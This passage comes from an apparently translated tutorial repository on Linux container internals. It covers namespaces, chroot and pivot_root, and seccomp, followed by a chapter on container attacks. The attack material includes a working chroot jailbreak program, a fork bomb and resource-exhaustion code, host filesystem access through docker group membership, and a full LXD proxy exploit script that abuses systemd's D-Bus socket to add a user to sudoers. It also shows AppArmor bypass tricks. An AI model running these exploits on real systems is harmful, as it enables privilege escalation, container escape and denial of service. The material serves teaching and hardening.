root          10  0.0  0.0   5888  2860 pts/0    R+   04:04   0:00 ps aux
```

## Inspecting Namespaces

Namespaces are also used outside of containers. The `lsns` command lists the Namespaces currently in use together with their processes.

```
ubuntu@docker:~$ sudo lsns
        NS TYPE   NPROCS   PID USER             COMMAND
4026531835 cgroup    143     1 root             /sbin/init
4026531836 pid       143     1 root             /sbin/init
4026531837 user      143     1 root             /sbin/init
4026531838 uts       139     1 root             /sbin/init
4026531839 ipc       143     1 root             /sbin/init
4026531840 mnt       135     1 root             /sbin/init
4026531860 mnt         1    33 root             kdevtmpfs
4026531992 net       143     1 root             /sbin/init
4026532210 mnt         2   412 root             /lib/systemd/systemd-udevd
4026532211 uts         2   412 root             /lib/systemd/systemd-udevd
4026532212 mnt         1   548 systemd-timesync /lib/systemd/systemd-timesyncd
4026532213 uts         1   548 systemd-timesync /lib/systemd/systemd-timesyncd
4026532214 mnt         1   627 systemd-network  /lib/systemd/systemd-networkd
4026532215 mnt         1   630 systemd-resolve  /lib/systemd/systemd-resolved
4026532272 mnt         1   693 root             /usr/sbin/irqbalance --foreground
4026532273 mnt         1   704 root             /lib/systemd/systemd-logind
4026532275 uts         1   704 root             /lib/systemd/systemd-logind
```

The `NS` column shows the Namespace ID, and you can see that no ID is duplicated.  
The Namespace IDs of a process can be checked under `/proc/$PID/ns`.

```
ubuntu@docker:~$ sudo ls -al /proc/1/ns
total 0
dr-x--x--x 2 root root 0 Nov 13 12:47 .
dr-xr-xr-x 9 root root 0 Nov 13 12:47 ..
lrwxrwxrwx 1 root root 0 Nov 13 12:48 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 ipc -> 'ipc:[4026531839]'
lrwxrwxrwx 1 root root 0 Nov 13 12:47 mnt -> 'mnt:[4026531840]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 net -> 'net:[4026531992]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 pid -> 'pid:[4026531836]'
lrwxrwxrwx 1 root root 0 Nov 13 13:01 pid_for_children -> 'pid:[4026531836]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Nov 13 12:48 uts -> 'uts:[4026531838]'
```
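The same information can be read programmatically. The following is a minimal Python sketch that parses the symlink targets under `/proc/<pid>/ns`; `parse_ns_link` and `namespaces_of` are hypothetical helper names. Two processes are in the same Namespace when the IDs for that type are equal.

```python
import os
import re

NS_LINK = re.compile(r"^(?P<type>\w+):\[(?P<inode>\d+)\]$")


def parse_ns_link(target: str):
    """Parse a /proc/<pid>/ns symlink target such as 'uts:[4026531838]'."""
    m = NS_LINK.match(target)
    if m is None:
        raise ValueError(f"unexpected namespace link: {target!r}")
    return m.group("type"), int(m.group("inode"))


def namespaces_of(pid="self"):
    """Return {link name: Namespace ID} for a process (Linux only)."""
    ns_dir = f"/proc/{pid}/ns"
    return {
        name: parse_ns_link(os.readlink(os.path.join(ns_dir, name)))[1]
        for name in sorted(os.listdir(ns_dir))
    }


print(parse_ns_link("uts:[4026531838]"))  # ('uts', 4026531838)
```

For example, comparing `namespaces_of(1)["uts"]` with `namespaces_of("self")["uts"]` tells you whether the current process shares the UTS Namespace with PID 1 (reading another process's entries may require root).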

A Namespace can be created with `unshare(2)`. The `unshare(1)` command makes this easy, so let's try it.  
Create a UTS Namespace and run bash inside it.

```
ubuntu@docker:~$ sudo unshare --uts bash
root@docker:/home/ubuntu# hostname test
root@docker:/home/ubuntu# hostname
test
root@docker:/home/ubuntu#
```

Running `lsns` shows that a UTS Namespace with ID `4026532216` has been created.

```
ubuntu@docker:~$ sudo lsns | grep bash
4026532216 uts         1  1441 root             bash
```


================================================
FILE: source/namespace/chroot-and-pivot_root.md
================================================
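# chroot and pivot_root

With the Mount Namespace, we confirmed that each Namespace can have its own mount points.  
However, in a container everything under the root directory `/` must be a separate file system; otherwise files on the host can be manipulated.  
`chroot` and `pivot_root` are used to achieve this.

Both are system calls that replace the root directory with a different directory, but they behave quite differently.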

## chroot

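`chroot` is a system call that changes the root directory of the current process and its child processes.  
For example, if you prepare an Alpine Linux rootfs as follows and chroot into that directory, the root directory appears to have been replaced.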

```sh
ubuntu@docker:~/$ mkdir alpine
ubuntu@docker:~/$ cd alpine
ubuntu@docker:~/alpine$ wget http://dl-cdn.alpinelinux.org/alpine/v3.12/releases/x86_64/alpine-minirootfs-3.12.1-x86_64.tar.gz
ubuntu@docker:~/alpine$ tar xzf alpine-minirootfs-3.12.1-x86_64.tar.gz
ubuntu@docker:~/alpine$ rm alpine-minirootfs-3.12.1-x86_64.tar.gz
ubuntu@docker:~/alpine$ cd ..

ubuntu@docker:~$ sudo chroot alpine sh
/ # ls
bin    etc    lib    mnt    proc   run    srv    tmp    var
dev    home   media  opt    root   sbin   sys    usr
/ # cat /etc/alpine-release
3.12.1
```

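### Problems with chroot

If a process has the `CAP_SYS_CHROOT` capability, it can break out of a chroot (that is, move from the chroot environment back to the original environment).  
This is by design and stems from the fact that chroot does not change the current working directory.

The task structure of a process holds `fs->root`, which stores the root directory, and `fs->pwd`, which stores the current working directory.  
Running `chroot /path/to/debian` sets `fs->root` to `/path/to/debian`.  
If you then run `chroot test` inside that chroot environment, `fs->root` becomes `/path/to/debian/test` while `fs->pwd` stays at `/path/to/debian`, so root ends up being a child of pwd.  
Each `cd ..` checks whether the current location is `fs->root`, but in this case it never matches `fs->root`, so you eventually reach the real root and escape the jail.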
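The reasoning about `fs->root` and `fs->pwd` can be illustrated with a toy model. The following Python sketch is not how the kernel is implemented; `walk_up` is a hypothetical function that only mimics the rule "going up stops when the current directory equals root".

```python
import posixpath


def walk_up(root: str, pwd: str, steps: int) -> str:
    """Toy model of repeated `cd ..`: stop only when the current directory equals root."""
    cur = pwd
    for _ in range(steps):
        if cur == root:
            break  # going above fs->root is refused
        cur = posixpath.dirname(cur)  # dirname("/") is "/", so the real root is the limit
    return cur


# Normal chroot: pwd is inside root, so the walk stops at root.
print(walk_up("/path/to/debian", "/path/to/debian/home", 10))  # /path/to/debian
# After the nested chroot: root is below pwd, so the check never matches.
print(walk_up("/path/to/debian/test", "/path/to/debian", 10))  # /
```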

Expressed as code, this looks like the following.

```sh
$ cat jailbreak.c
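#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
  /* Create a directory inside the jail and chroot into it; the cwd stays outside the new root. */
  mkdir("test", 0755);
  chroot("test");
  /* The cwd is now above fs->root, so ".." is never stopped and reaches the real root. */
  chroot("../../../../../../../../../../");
  execl("/bin/bash", "bash", (char *)NULL);
  perror("execl");
  return 1;
}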

$ gcc jailbreak.c
$ mv a.out debian/
$ sudo chroot debian bash
# ./a.out
/home/ubuntu/debian# cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS"
```

As shown, a process that is allowed to call chroot can break out of the jail.  
To prevent this kind of breakout, the pivot_root system call can be used.

## pivot_root

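chroot changes the root directory, whereas pivot_root swaps the root file system of the process.  
In other words, it moves the current root file system to another location and mounts the new root file system at `/`.  
Because the root is swapped out for something entirely different, there is no way to break out as with chroot. The old root file system can also be unmounted.  

However, the following conditions must be met to use pivot_root.[^1]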

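* `new_root` (the new root file system) and `put_old` (the location the old root file system is moved to) must not be on the same mount as the current root file system
* `put_old` must be at or underneath `new_root`
* No other file system may be mounted on `put_old`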

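To satisfy these conditions, a bind mount is used. A bind mount mounts a given directory at another location as is. Its interface resembles the `ln` command, but because the result acts as a mount point, it satisfies the conditions for pivot_root.

One more caveat: pivot_root manipulates mount points and changes the root directory, so it is run inside a Mount Namespace.  
Let's build a container look-alike with its rootfs swapped.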

```sh
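# NEW_ROOT is assumed to hold the path of the extracted rootfs (for example the alpine directory used for chroot).
# Steps: bind mount the new root, mount procfs, create .put_old, pivot_root, then lazily unmount the old root.
ubuntu@docker:~$ sudo unshare --uts --pid --fork --mount sh -c \
  "mount --bind $NEW_ROOT $NEW_ROOT && \
  mount -t proc proc $NEW_ROOT/proc && \
  mkdir -p $NEW_ROOT/.put_old && \
  pivot_root $NEW_ROOT $NEW_ROOT/.put_old && \
  umount -l /.put_old && \
  cd / && \
  exec /bin/sh"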

/ # ps aux
PID   USER     TIME  COMMAND
    1 root      0:00 /bin/sh
    6 root      0:00 ps aux
/ # ls /etc
alpine-release  hosts           modules-load.d  periodic        shells
apk             init.d          motd            profile         ssl
conf.d          inittab         mtab            profile.d       sysctl.conf
crontabs        issue           network         protocols       sysctl.d
fstab           logrotate.d     opt             securetty       udhcpd.conf
group           modprobe.d      os-release      services
hostname        modules         passwd          shadow
```

---

[^1]: For the other conditions and further details, see the man page at https://man7.org/linux/man-pages/man2/pivot_root.2.html


================================================
FILE: source/namespace/mount.md
================================================
# Mount Namespace

The Mount Namespace isolates mount points. In the PID Namespace section, `procfs` was mounted so that only the process started by unshare could see it.  
In this way, each process can have its own mount points. For example, mounting a different `tmpfs` per process keeps its contents completely hidden from other processes.  

With `unshare(1)`, the `--mount` flag creates a Mount Namespace.

```sh
ubuntu@docker:~$ sudo unshare --mount bash
root@docker:/home/ubuntu# mount -t tmpfs tmpfs /mnt
root@docker:/home/ubuntu# findmnt /mnt
TARGET SOURCE FSTYPE OPTIONS
/mnt   tmpfs  tmpfs  rw,relatime
root@docker:/home/ubuntu# touch /mnt/test
root@docker:/home/ubuntu# ls /mnt
test

# Run on the host
ubuntu@docker:~$ findmnt /mnt
ubuntu@docker:~$ ls /mnt/
ubuntu@docker:~$
```

As shown, the mount point is visible only to processes inside the Namespace.  
The same mechanism is used by systemd's PrivateTmp.


================================================
FILE: source/namespace/pid.md
================================================
# PID Namespace

The PID Namespace isolates process IDs. Running `ps` inside a container shows that a process with PID 1 exists.  
Linux normally cannot create processes with duplicate PIDs, but because the Namespaces differ, processes can appear to have the same PID.  

With `unshare(1)`, the `--pid` flag creates a PID Namespace.  

```sh
$ sudo unshare --pid --fork bash
root@docker:/home/ubuntu# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 167632 11704 ?        Ss   12:47   0:02 /sbin/init
root           2  0.0  0.0      0     0 ?        S    12:47   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   12:47   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   12:47   0:00 [rcu_par_gp]
```

`ps` still shows the host's processes because it reads `/proc`.  
However, sending a signal with `kill`, for example, fails with "No such process", which confirms that the PID Namespace itself is isolated.

```sh
# Run on the host
ubuntu@docker:~$ sleep 100

# Run inside the Namespace
root@docker:/home/ubuntu# ps aux | grep sleep
ubuntu      1545  0.0  0.0   7228   592 pts/1    S+   13:34   0:00 sleep 100
root        1547  0.0  0.0   8160   732 pts/0    S+   13:34   0:00 grep --color=auto sleep
root@docker:/home/ubuntu# kill -9 1545
bash: kill: (1545) - No such process
```

So how can host processes be hidden from `ps`?  
Remounting `procfs` inside the PID Namespace would do it, but that alone would affect the host.  
Isolating the Mount Namespace as well lets you mount a fresh `procfs` without affecting the host.  

The Mount Namespace is covered later; for now, `unshare(1)` provides the `--mount-proc` option, so we use that.  
It mounts `procfs` inside a new Mount Namespace for you.

```sh
ubuntu@docker:~$ sudo unshare --pid --fork --mount-proc bash
root@docker:/home/ubuntu# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   8960  3876 pts/0    S    13:42   0:00 bash
root           8  0.0  0.0  10608  3256 pts/0    R+   13:42   0:00 ps aux
```

Earlier we said that processes "appear to have the same PID"; that is the view from inside the Namespace. Seen from the host, PIDs are unique as usual.  

```sh
root@docker:/home/ubuntu# sleep 100 &
[1] 10
root@docker:/home/ubuntu# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   8960  3940 pts/0    S    13:42   0:00 bash
root          10  0.0  0.0   7228   592 pts/0    S    13:44   0:00 sleep 100
root          11  0.0  0.0  10608  3364 pts/0    R+   13:44   0:00 ps aux

# Check on the host
ubuntu@docker:~$ ps aux | grep sleep
root        1656  0.0  0.0   7228   592 pts/0    S    13:44   0:00 sleep 100
ubuntu      1659  0.0  0.0   8160   736 pts/1    S+   13:44   0:00 grep --color=auto sleep
```
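On reasonably recent kernels, the host can see both PIDs of such a process on the `NSpid` line of `/proc/<pid>/status`, which lists the PID in each nested PID Namespace, outermost first. The following is a minimal Python sketch; `parse_nspid` is a hypothetical helper name and the status text is an illustrative excerpt whose values mirror the `sleep` process above.

```python
def parse_nspid(status_text: str):
    """Return the PIDs on the NSpid line of /proc/<pid>/status, outermost Namespace first."""
    for line in status_text.splitlines():
        if line.startswith("NSpid:"):
            return [int(field) for field in line.split()[1:]]
    return []


# Illustrative excerpt: host PID 1656 is PID 10 inside the new PID Namespace.
sample_status = "Name:\tsleep\nPid:\t1656\nNSpid:\t1656\t10\n"
print(parse_nspid(sample_status))  # [1656, 10]
```

On the host, `parse_nspid(open("/proc/1656/status").read())` would be the equivalent call for a live process.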


================================================
FILE: source/namespace/user.md
================================================
# User Namespace

The User Namespace isolates UIDs / GIDs so that a Namespace can have its own independent set of UIDs / GIDs.  
UIDs / GIDs inside the Namespace are mapped to UIDs / GIDs on the host.

For example, a process can be UID 0 (root) inside the Namespace while appearing as UID 1000 from the host.  
Even if an attacker escapes from the container to the host, they only have the privileges of the unprivileged user with UID 1000, which limits the impact.

With `unshare(1)`, the `--user` flag creates a User Namespace.  

```sh
ubuntu@docker:~$ unshare --user bash
nobody@docker:~$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@docker:~$ echo $$
2275
```

At this point the user inside the Namespace is `nobody`.  
Let's map UID 1000 on the host to UID 0 (root) inside the Namespace.
The mapping takes effect by writing values to the `uid_map` of the target process.

```sh
# Run on the host
root@docker:/home/ubuntu# echo '0 1000 1' > /proc/2275/uid_map
```

Checking inside the Namespace confirms that the UID is now 0 (root).

```sh
nobody@docker:~$ id
uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
```

A file created there appears to be owned by root inside the Namespace, but it is actually owned by the `ubuntu` user, UID 1000.

```sh
nobody@docker:~$ touch test.txt
nobody@docker:~$ ls -al test.txt
-rw-rw-r-- 1 root nogroup 0 Nov 13 14:10 test.txt

# Run on the host
ubuntu@docker:~$ ls -al test.txt
-rw-rw-r-- 1 ubuntu ubuntu 0 Nov 13 14:10 test.txt
```
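Each line of `uid_map` has the form `<first ID inside the Namespace> <first ID outside> <length>`. The following Python sketch shows how such a mapping translates IDs; `parse_uid_map` and `to_host_uid` are hypothetical helper names, and the mapping string is the one written in the example above.

```python
def parse_uid_map(text: str):
    """Parse uid_map lines: '<ID inside ns> <ID outside ns> <length>'."""
    return [tuple(int(x) for x in line.split()) for line in text.splitlines() if line.strip()]


def to_host_uid(ns_uid: int, uid_map):
    """Translate a UID inside the Namespace to the UID outside it, or None if unmapped."""
    for inside, outside, length in uid_map:
        if inside <= ns_uid < inside + length:
            return outside + (ns_uid - inside)
    return None


mapping = parse_uid_map("0 1000 1\n")
print(to_host_uid(0, mapping))  # 1000
print(to_host_uid(1, mapping))  # None
```

IDs without a mapping are what show up as `nobody` / `nogroup` (65534) inside the Namespace, as seen for the GID in the `id` output above.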


================================================
FILE: source/namespace/uts.md
================================================
# UTS Namespace

The UTS Namespace is used to isolate the hostname.  
Calls such as `uname(2)` and `gethostname(2)` return the values set inside the Namespace.  

Passing the `--uts` flag to `unshare(1)` creates a UTS Namespace.  
Changing the hostname with `hostname(1)` has no effect on the host.

```sh
ubuntu@docker:~$ sudo unshare --uts bash
root@docker:/home/ubuntu# hostname test
root@docker:/home/ubuntu# hostname
test

# On the host
ubuntu@docker:~$ hostname
docker
```


================================================
FILE: source/seccomp/README.md
================================================
# seccomp

seccomp is a mechanism for restricting system calls and their arguments.  
For example, giving Docker the following seccomp profile creates a container in which `mkdir` is forbidden.

```sh
$ cat seccomp.json
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["mkdir"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}

$ docker run --rm -it --security-opt seccomp=seccomp.json ubuntu:20.04 bash
root@ab9ad7d57f7f:/# mkdir /tmp/test
mkdir: cannot create directory '/tmp/test': Operation not permitted
```

As with capabilities, Docker ships a default seccomp profile.[^1]  
Used together with capabilities, seccomp can still block a privileged system call even if the capability restrictions are bypassed.
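A deny-list profile like the one above can also be generated from a script. The following Python sketch is only an illustration: `deny_profile` is a hypothetical helper, it uses the list-valued `names` key of Docker's profile format, and adding `mkdirat` is an assumption made because directories can also be created through that system call.

```python
import json


def deny_profile(syscalls):
    """Build an allow-by-default seccomp profile that returns an error for the given syscalls."""
    return {
        "defaultAction": "SCMP_ACT_ALLOW",
        "syscalls": [
            {"names": sorted(syscalls), "action": "SCMP_ACT_ERRNO"}
        ],
    }


profile = deny_profile({"mkdir", "mkdirat"})
print(json.dumps(profile, indent=2))
```

The printed JSON can be saved to a file and passed with `--security-opt seccomp=<file>` in the same way as `seccomp.json` above.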

---

[^1]: https://docs.docker.com/engine/security/seccomp/ "Significant syscalls blocked by the default profile / docker docs"


================================================
FILE: source/security/DoS.md
================================================
# DoS

Because containers share resources with the host, a container without appropriate resource limits can cause a denial of service (DoS) on the host.

## Fork Bomb

If the number of processes is not limited, for example with cgroups, spawning a large number of processes in a container can bring the system down.

```sh
:(){ :|:& };:
```

## Opening a Large Number of File Descriptors

The number of file descriptors that can be open is limited, so opening a large number of them in a container can affect the host.

```c
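#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(void)
{
  char buf[100];
  for (int i = 0; i < 400275; i++) {
    snprintf(buf, sizeof(buf), "/tmp/%d", i);
    /* O_CREAT requires a mode argument; open() returns -1 on failure. */
    int fd = open(buf, O_CREAT | O_WRONLY, 0600);
    if (fd == -1) {
      printf("max fd %d\n", i);
      break;
    }
    printf("open %d\n", i);
  }
  /* Keep the process alive so the descriptors stay open. */
  for (;;);
}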
```
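To judge how close a system is to these limits, the per-process limit (`RLIMIT_NOFILE`) and the system-wide counters in `/proc/sys/fs/file-nr` can be inspected. The following is a minimal Python sketch; `parse_file_nr` is a hypothetical helper name and the sample string stands in for the real file contents.

```python
import resource


def parse_file_nr(text: str):
    """Parse /proc/sys/fs/file-nr: allocated handles, unused handles, system-wide maximum."""
    allocated, unused, maximum = (int(x) for x in text.split())
    return {"allocated": allocated, "unused": unused, "max": maximum}


# Per-process limit of the current process as (soft, hard).
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
print("RLIMIT_NOFILE:", soft, hard)

# Sample contents; on a Linux host, read the real file instead.
print(parse_file_nr("1184\t0\t400275\n"))
```

Setting a lower limit per container (for example with Docker's `--ulimit nofile=...`) is one way to keep a single container from consuming the shared pool.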

## Exhausting Disk Space

If a container has no disk quota, creating large files can exhaust the host's disk space.

```sh
$ dd if=/dev/zero of=bigfile bs=1GB count=200
```


================================================
FILE: source/security/README.md
================================================
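# Container Security and Attack Examples

This chapter covers the vulnerabilities that arise when the protection layers introduced in [Container Basics](../container-basics.md) are misconfigured, as well as Docker security in general.

Possible attack paths against containers include exploiting runtime vulnerabilities, exploiting kernel vulnerabilities, and exploiting container misconfigurations.  
Containers are also increasingly used in development and CI environments, which can be compromised through malicious Docker images.

![Docker Attack Vector](./img/docker-attack-vector.png)

Some readers may have granted capabilities to a container or run a privileged container. If such a container is compromised, the attacker may be able to escape (break out) to the host. This chapter walks through attacks against such containers and offers hints for operating containers securely.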


================================================
FILE: source/security/adding-a-user-to-group.md
================================================
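# Adding Users to Groups with Container Execution Privileges

Adding a user to the `docker` or `lxd` group is equivalent to granting that user root privileges.  
With docker, for example, mounting the host's root directory as follows allows arbitrary operations on the host.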

```sh
ubuntu@sandbox:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
ubuntu@sandbox:~$ docker run --rm -it -v /:/hostfs ubuntu:latest bash
root@f6a72ca2aaf6:/# cat /hostfs/etc/shadow
root:*:18444:0:99999:7:::
...
```

However, when containers are not run as root, as with rootless Docker, they are created with the privileges of an unprivileged user, which mitigates this attack.

```sh
ubuntu@rootless-docker:~$ docker run --rm -it -v /:/hostfs ubuntu:latest bash
root@0e55694c273c:/# cat /hostfs/etc/shadow
cat: /hostfs/etc/shadow: Permission denied
```

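## Adding a User to the lxd Group

With LXD, adding a user to the `lxd` group allows them to operate containers, but as with docker this is equivalent to granting root privileges.  

### Privilege Escalation via Hooks

LXC has a hook feature that can be used to run arbitrary commands as root.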

```sh
$ lxc launch images:ubuntu/trusty/amd64 runme -c raw.lxc="lxc.hook.pre-start=sh -c 'echo foo >/runme'"
Creating runme
Starting runme
user@host:~$ ls -l /runme 
-rw-r--r-- 1 root root 5 May  7 10:29 /runme
```

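### Privilege Escalation via the LXD Proxy

When a unix socket is accessed through an LXD proxy device, the connection carries root's credentials.  
This can be used to connect to the systemd socket and control arbitrary services.

For example, start the following program, which communicates over a unix socket.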

```sh
$ cat echo.py
import socket
import struct

def main():
    """Echo UNIX peercreds"""
    listen_sock = '/tmp/echo.sock'
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.bind(listen_sock)
    sock.listen()

    while True:
        print('waiting for a connection')
        connection = sock.accept()[0]
        peercred = connection.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED,
                                         struct.calcsize("3i"))
        pid, uid, gid = struct.unpack("3i", peercred)

        print("PID: {}, UID: {}, GID: {}".format(pid, uid, gid))

        continue

if __name__ == '__main__':
    main()

$ python3 echo.py
waiting for a connection
# Connecting with nc -U /tmp/echo.sock prints the caller's UID and GID
PID: 15373, UID: 1001, GID: 1001
```
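The `SO_PEERCRED` lookup that `echo.py` relies on can be tried without a separate client. The following is a minimal, Linux-only Python sketch: `peer_credentials` is a hypothetical helper name, and `socket.socketpair()` is used so that the peer is the current process itself.

```python
import os
import socket
import struct


def peer_credentials(conn: socket.socket):
    """Return (pid, uid, gid) of the peer of a connected UNIX socket (Linux SO_PEERCRED)."""
    raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, struct.calcsize("3i"))
    return struct.unpack("3i", raw)


# socketpair() returns two connected AF_UNIX sockets inside one process,
# so the reported peer is this process.
left, right = socket.socketpair()
pid, uid, gid = peer_credentials(left)
print(pid == os.getpid(), uid == os.geteuid(), gid == os.getegid())
left.close()
right.close()
```

The credentials are those of whoever opened the connection, which is why a connection relayed by a root-owned proxy process is reported as UID 0.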

Set up an LXD proxy and check whether the connection arrives as root. The following command connects `/tmp/proxy.sock` in the container to `/tmp/echo.sock` on the host.

```sh
$ lxc config device add test proxy_sock proxy connect=unix:/tmp/echo.sock listen=unix:/tmp/proxy.sock bind=container mode=0777
Device proxy_sock added to test
```

Connecting in the same way shows that the peer is now root.

```sh
$ lxc exec test -- sudo --user ubuntu --login
ubuntu@test:~$ nc -U /tmp/proxy.sock

$ python3 echo.py
...
PID: 14988, UID: 0, GID: 0
```

This, too, is because lxd runs as root.

```sh
$ ps aux | grep 14988
root     14988  0.0  0.7 1230076 30576 ?       Ssl  03:54   0:00 /snap/lxd/current/bin/lxd forkproxy -- 14522 -1 unix:/tmp/proxy.sock 13977 -1 unix:/var/lib/snapd/hostfs/tmp/echo.sock /var/snap/lxd/common/lxd/logs/test/proxy.proxy_sock.log /var/snap/lxd/common/lxd/devices/test/proxy.proxy_sock   0777
```

Talking to the systemd socket in this way leads to arbitrary code execution.  
Bind `/run/systemd/private`, which systemd uses, to `/tmp/container_sock` in the container, and then bind that back to the host so it can be reached without entering the container.

```sh
lowpriv@vagrant:~$ lxc config device add test container_sock proxy connect=unix:/run/systemd/private listen=unix:/tmp/container_sock bind=container mode=0777
Device container_sock added to test
lowpriv@vagrant:~$ lxc config device add test host_sock proxy connect=unix:/tmp/container_sock listen=unix:/tmp/host_sock bind=host mode=0777
Device host_sock added to test
```

Create a systemd unit file that adds the user to sudoers and run it through the systemd socket to escalate to root.

```sh
$ cat /tmp/evil.service
[Unit]
Description=evil
[Service]
Type=oneshot
ExecStart=/bin/sh -c "echo user ALL=\(ALL\) NOPASSWD: ALL >> /etc/sudoers"
[Install]
WantedBy=multi-user.target

$ cat exploit.py
import socket
import sys
import time

AUTH = u'\0AUTH EXTERNAL 30\r\nNEGOTIATE_UNIX_FD\r\nBEGIN\r\n'

LINK = u'l\1\4\1$\0\0\0\1\0\0\0\242\0\0\0\1\1o\0\31\0\0\0/org/freedesktop/systemd1\0\0\0\0\0\0\0\3\1s\0\r\0\0\0LinkUnitFiles\0\0\0\2\1s\0 \0\0\0org.freedesktop.systemd1.Manager\0\0\0\0\0\0\0\0\6\1s\0\30\0\0\0org.freedesktop.systemd1\0\0\0\0\0\0\0\0\10\1g\0\4asbb\0\0\0\0\0\0\0\26\0\0\0\21\0\0\0/tmp/evil.service\0\0\0\0\0\0\0\0\0\0\0'

RELOAD = u'l\1\4\1\0\0\0\0\2\0\0\0\211\0\0\0\1\1o\0\31\0\0\0/org/freedesktop/systemd1\0\0\0\0\0\0\0\3\1s\0\6\0\0\0Reload\0\0\2\1s\0 \0\0\0org.freedesktop.systemd1.Manager\0\0\0\0\0\0\0\0\6\1s\0\30\0\0\0org.freedesktop.systemd1\0\0\0\0\0\0\0\0'

START = u'l\1\4\1 \0\0\0\1\0\0\0\240\0\0\0\1\1o\0\31\0\0\0/org/freedesktop/systemd1\0\0\0\0\0\0\0\3\1s\0\t\0\0\0StartUnit\0\0\0\0\0\0\0\2\1s\0 \0\0\0org.freedesktop.systemd1.Manager\0\0\0\0\0\0\0\0\6\1s\0\30\0\0\0org.freedesktop.systemd1\0\0\0\0\0\0\0\0\10\1g\0\2ss\0\f\0\0\0evil.service\0\0\0\0\7\0\0\0replace\0'

def send_msg(sock_name, msg):
    client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client_sock.connect(sock_name)

    try:
        client_sock.sendall(AUTH.encode('latin-1'))
        reply = client_sock.recv(8192).decode("latin-1")
        print(reply)

        client_sock.sendall(msg.encode('latin-1'))
        reply = client_sock.recv(8192).decode("latin-1")

        print(reply)
    except:
        print("Connection reset...")

def main():

    for msg in [LINK, RELOAD, START]:
        send_msg(sys.argv[1], msg)
        time.sleep(1)

if __name__ == '__main__':
    main()

$ python3 exploit.py /tmp/host_sock
OK c00157aa91bf4b70a9fcbe8e556ca3c1
AGREE_UNIX_FD

lo/org/freedesktop/systemd1s org.freedesktop.systemd1.ManagersUnitFilesChangedsorg.freedesktop.systemd1lR<usorg.freedesktop.systemdga(sss)Jsymlink /etc/systemd/system/evil.service/tmp/evil.service
OK 95eb8e05ae1647c7ba5aae363557ff5d
AGREE_UNIX_FD

lo/org/freedesktop/systemd1s org.freedesktop.systemd1.Managers  Reloadingsorg.freedesktop.systemdgb
OK 92f3058be4c74bf5a7f05a16182f393a
AGREE_UNIX_FD

lY¶o-/org/freedesktop/systemd1/unit/evil_2eservicesorg.freedesktop.DBus.PropertiessPropertiesChangedsorg.freedesktop.systemdsa{sv}as org.freedesktop.systemd1.Service¼MainPIDu
ControlPIDu
StatusTexts
           StatusErrnoiResults  exit-codeUIDuÿÿÿÿGIDuÿÿÿÿ       NRestartsuExecMainStartTimestamptØ
©ExecMainStartTimestampMonotonictÔOÔ
©ExecMainExitTimestampMonotonictîÔ

ExecMainPIDu^?
              ExecMainCodeiExecMainStatusii
ExecStartPost                              ExecStartPre ExecStart
ExecReloaExecStop
                 ExecStopPost

$ sudo su
root@host:~/# id
uid=0(root) gid=0(root) groups=0(root)
```


================================================
FILE: source/security/apparmor-bypass.md
================================================
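# AppArmor Bypass Techniques

Because AppArmor's rule syntax is complex, it is easy to write rules that can be bypassed.  
This section shows a few examples.

## Renaming the Parent Directory

The following rule is meant to prevent `mybash` from operating on files under `.ssh/`.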

```c
#include <tunables/global>

/home/ubuntu/mybash {
  #include <abstractions/base>
  file,

  deny /home/ubuntu/.ssh/** mrwklx,
}
```

It looks fine at first glance, but it can be bypassed by renaming `.ssh`.

```sh
ubuntu@sandbox:~$ cat .ssh/id_rsa
cat: .ssh/id_rsa: Permission denied
ubuntu@sandbox:~$ mv .ssh .sshx
ubuntu@sandbox:~$ head .sshx/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEApQusoFpwaUZ9k8Y8b521n76ImX85uGTtrnMLTK2XDkp+AEj/
```
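The bypass works because the rule matches on the path string rather than on the file itself. The following Python sketch is a toy stand-in for that behavior, not AppArmor's actual matcher; `denied` is a hypothetical function that treats `deny /home/ubuntu/.ssh/**` as a simple prefix check.

```python
def denied(path: str, deny_prefix: str = "/home/ubuntu/.ssh/") -> bool:
    """Toy stand-in for `deny /home/ubuntu/.ssh/** ...`: match on the path string only."""
    return path.startswith(deny_prefix)


print(denied("/home/ubuntu/.ssh/id_rsa"))   # True: matched by the rule
print(denied("/home/ubuntu/.sshx/id_rsa"))  # False: same file after `mv .ssh .sshx`
```

Denying write access to the parent directory as well, so that the rename itself is refused, is one way to close this gap.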

## Bypass Using a Shebang

Suppose mybash is forbidden from executing perl as follows.

```c
#include <tunables/global>

/home/ubuntu/mybash {
  #include <abstractions/base>
  file,

  deny /usr/bin/perl mrwlx,
}
```

In this case, perl can still be executed by way of a shebang.

```sh
ubuntu@sandbox:~$ cat test.pl
#!/usr/bin/perl

print("hello\n")
ubuntu@sandbox:~$ perl ./test.pl
mybash: /usr/bin/perl: Permission denied
ubuntu@sandbox:~$ ./test.pl
hello
```


================================================
FILE: source/security/breakout-to-host.md
================================================
# Escaping to the Host

